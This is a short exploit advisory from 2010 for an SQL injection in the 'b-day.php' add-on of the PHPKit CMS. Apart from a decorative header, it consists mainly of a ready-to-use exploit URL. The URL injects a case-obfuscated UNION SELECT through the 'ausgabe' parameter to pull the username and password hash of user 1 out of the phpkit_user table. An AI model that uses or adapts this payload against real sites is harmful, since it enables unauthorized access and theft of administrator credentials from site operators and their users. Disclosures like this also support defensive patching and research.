The PHP-Kit b-day.php add-on suffers from a remote SQL injection vulnerability.
d11d141a967cfd196493f05c734bc0c5a164ea49c9a35acc3603b21b423913e0
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
~ Phpkit addon (b-day.php) SQL Injection Vulnerability ~
.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
[+] Autor: n3w7u
[+] Vulnerabilities [ SQL Injection ]
[+] Language: [ PHP ]
[+] Date: 22.03.2010
.-=--=--=--=--=--=--=--=--=--=--=-.
[+] Vulnerability
include.php?path=b-day.php&ausgabe=
[+] Exploitable
http://[host]/[path]/include.php?path=b-day.php&ausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1--